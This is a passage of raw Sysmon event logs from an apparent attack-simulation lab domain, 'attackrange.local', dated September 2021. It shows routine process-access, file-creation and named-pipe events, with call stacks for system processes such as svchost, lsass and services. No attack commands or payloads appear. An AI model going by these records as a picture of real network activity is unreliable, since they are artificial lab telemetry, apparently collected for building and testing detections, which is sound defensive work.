09:21:46.061{5EBD8912-8CC0-6151-1600-00000000FD01}12963424C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+6585d|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055611Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.061{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001055610Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT10532021-09-27 09:21:46.046{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\CreateExplorerShellUnelevatedTask2021-09-27 07:58:56.096 23542300x80000000000000001055609Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.046{5EBD8912-8CC0-6151-1600-00000000FD01}1296NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\CreateExplorerShellUnelevatedTaskMD5=7A2163BAF11F784E3E14894450E1185D,SHA256=299A7F1EA1B6D7319064263EF354F04C7B1EE1BA5CDE1D75F606F1708CE58615,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055608Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.046{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D29-6151-9300-00000000FD01}4552C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055607Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.046{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D29-6151-9300-00000000FD01}4552C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055606Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.030{5EBD8912-8CC0-6151-1600-00000000FD01}12961944C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-9300-00000000FD01}4552C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055605Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.030{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-9300-00000000FD01}4552C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055604Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.030{5EBD8912-8CBD-6151-0A00-00000000FD01}624684C:\Windows\system32\services.exe{5EBD8912-8D2A-6151-9500-00000000FD01}4604C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055603Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.030{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9500-00000000FD01}4604C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055602Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.015{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8D2A-6151-9500-00000000FD01}4604C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055601Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.015{5EBD8912-8CBD-6151-0A00-00000000FD01}624100C:\Windows\system32\services.exe{5EBD8912-8D2A-6151-9500-00000000FD01}4604C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055600Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.015{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055599Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.015{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055598Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.015{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055597Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.015{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000980881Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:47.978{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8ABE9C4BEC9B0C4BE0A6BB5C66051355,SHA256=D27FBE00D080E22E643F2C0A11C1471918BC866D84317EC6B97BD8B598BDCD0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980880Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:47.900{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCE72B5F18F19891104230E262E12995,SHA256=5D84A4623718424D6CD13310B5FCE9C2C505F8F221B55CDB9A7B96C653088A0C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055737Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.978{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055736Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.978{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055735Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.978{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055734Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.978{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x80000000000000001055733Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-ConnectPipe2021-09-27 09:21:47.978{5EBD8912-8D2B-6151-9800-00000000FD01}4976\TDLN-4976-41C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe 17141700x80000000000000001055732Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:21:47.978{5EBD8912-8CD0-6151-2C00-00000000FD01}2424\TDLN-4976-41C:\Windows\system32\svchost.exe 10341000x80000000000000001055731Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.978{5EBD8912-8CD0-6151-2C00-00000000FD01}24243128C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001055730Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.978{5EBD8912-8CD0-6151-2C00-00000000FD01}24243128C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x80000000000000001055729Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.978{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055728Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.978{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055727Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 